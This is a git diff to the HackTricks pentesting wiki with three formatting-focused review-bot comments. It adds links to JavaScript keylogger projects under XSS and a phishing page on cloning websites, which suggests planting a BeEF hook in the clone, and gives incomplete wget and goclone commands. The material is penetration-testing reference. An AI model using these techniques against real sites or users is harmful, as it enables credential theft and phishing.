diff --git a/SUMMARY.md b/SUMMARY.md index 1e2359316..36e26bf23 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -1,13 +1,14 @@ # Table of contents * [HackTricks](README.md) +* [About the author](about-the-author.md) * [Getting Started in Hacking](getting-started-in-hacking.md) * [Pentesting Methodology](pentesting-methodology.md) * [External Recon Methodology](external-recon-methodology.md) * [Phishing Methodology](phishing-methodology/README.md) + * [Clone a Website](phishing-methodology/clone-a-website.md) * [Detecting Phising](phishing-methodology/detecting-phising.md) * [Phishing Documents](phishing-methodology/phishing-documents.md) -* [About the author](about-the-author.md) * [Exfiltration](exfiltration.md) * [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md) * [Brute Force - CheatSheet](brute-force.md) diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 0a7f5716b..d727731e5 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md @@ -651,9 +651,11 @@ for(var i=0; i::placeholder { color:white; } @@ -674,6 +676,15 @@ body:username.value+':'+this.value When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated. +### Keylogger + +Just searching in github I found a few different ones: + +* [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger) +* [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger) +* [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger) +* You can also use metasploit `http_javascript_keylogger` + ### XSS - Stealing CSRF tokens ```javascript 
diff --git a/phishing-methodology/clone-a-website.md b/phishing-methodology/clone-a-website.md new file mode 100644 index 000000000..0198053e9 --- /dev/null +++ b/phishing-methodology/clone-a-website.md @@ -0,0 +1,27 @@ +# Clone a Website + +For a phishing assessment sometimes it might be useful to completely **clone a website**. + +Note that you can add also some payloads to the cloned website like a BeEF hook to "control" the tab of the user. + +There are different tools you can use for this purpose: + +### wget + +```text +wget -mk -nH +``` + +### goclone + +```bash +#https://github.com/imthaghost/goclone +oclone +``` + +### Social Engineering Toolit + +```bash +#https://github.com/trustedsec/social-engineer-toolkit +``` +
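Review bot: In the SUMMARY.md hunk, moving `* [About the author](about-the-author.md)` from below the Phishing Methodology entries to directly under HackTricks is unrelated to the new Clone a Website page and would be easier to review as its own commit. Please also confirm that the added `* [Clone a Website](phishing-methodology/clone-a-website.md)` line carries the same indentation as the neighbouring Detecting Phising and Phishing Documents entries, so that it nests under Phishing Methodology in the rendered table of contents.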
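Review bot: In the XSS README hunk at `@@ -674,6 +676,15 @@`, the new Keylogger section is documentation-thin: it is a bare list of links with no sentence on what the section covers or how the three listed projects differ, and "Just searching in github I found a few different ones" reads as a personal note rather than reference text. Suggest opening the section with a one-line description, adding a short remark per link, and using consistent capitalization (GitHub, Metasploit) in the added lines.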
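Review bot: In the new file phishing-methodology/clone-a-website.md, none of the three tool sections contains a complete command as shown: `wget -mk -nH` has no target argument, the goclone block invokes `oclone` (apparently a typo for `goclone`) with no argument, and the last block holds only the repository URL comment. Suggest adding an explicit placeholder for the target in each command, one line explaining what the wget flags do, and either a real invocation or removal of the empty block for the toolkit. Smaller points in the same hunk: the heading `### Social Engineering Toolit` is misspelled (the linked repository is social-engineer-toolkit), the wget fence is tagged `text` while the other two use `bash`, and "you can add also" should read "you can also add".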